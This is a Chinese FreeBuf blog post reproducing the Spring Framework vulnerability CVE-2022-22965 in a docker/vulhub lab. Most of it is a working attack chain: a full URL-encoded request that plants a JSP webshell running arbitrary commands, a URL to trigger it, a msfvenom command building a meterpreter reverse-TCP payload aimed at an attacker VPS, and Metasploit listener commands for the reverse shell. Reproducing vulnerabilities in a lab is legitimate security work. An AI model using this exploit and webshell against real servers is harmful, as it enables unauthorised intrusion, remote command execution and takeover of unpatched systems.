freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2022-22965远程代码执行漏洞复现
2022-09-20 16:38:01
所属地 山东省

漏洞介绍:


该CVE-2022-22965是在Java 9的环境下,引入了class.module.classLoader,导致了CVE-2010-1622漏洞补丁的绕过,JDK9中存在可以绕过黑名单禁用的类,导致了这个漏洞。

影响版本:

Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20

一、复现工具:

1.docker+vulhub

2.burpsuite

3.一台vps(虚拟机也可以)

docker跟vulhub安装下载就不说了,网上多的是,下面启动漏洞环境的命令

systemctl start docker 启动docker

docker-compose up -d启动漏洞环境

docker-compose down 删除漏洞环境

二、漏洞验证

1.访问8080端口

2.写入jsp文件

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

3.访问写入的webshell文件

http://your-ip:8080/tomcatwar.jsp?pwd=j&cmd=whoami

三、反弹shell

1.用msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=your-公网ip LPORT=2626 -f elf > shell.elf

2.然后去木马的当前目录下开启开启web服务,并访问jsp shell文件请求下载生成的木马

python3 -m http.server 2626(端口随便写,但是要打开对应的防火墙规则)

3.可以防止木马文件没有执行权限,这先给个权限

chmod 777 shell.elf

4.msf开启监听

msfconsole                                         # 在命令行里面输入命令,进入msf漏洞利用框架;
use exploit/multi/handler                          # 监听木马反弹过来的shell
set payload linux/x86/meterpreter/reverse_tcp  	   # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;
set lhost vps                                      # 我们的vps ip
set lport vps端口                                  # 我们的vps端口
exploit                                            # 开始进行监听;

5.执行木马

6.反弹成功

# 漏洞 # 漏洞复现 # 漏洞复现环境
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录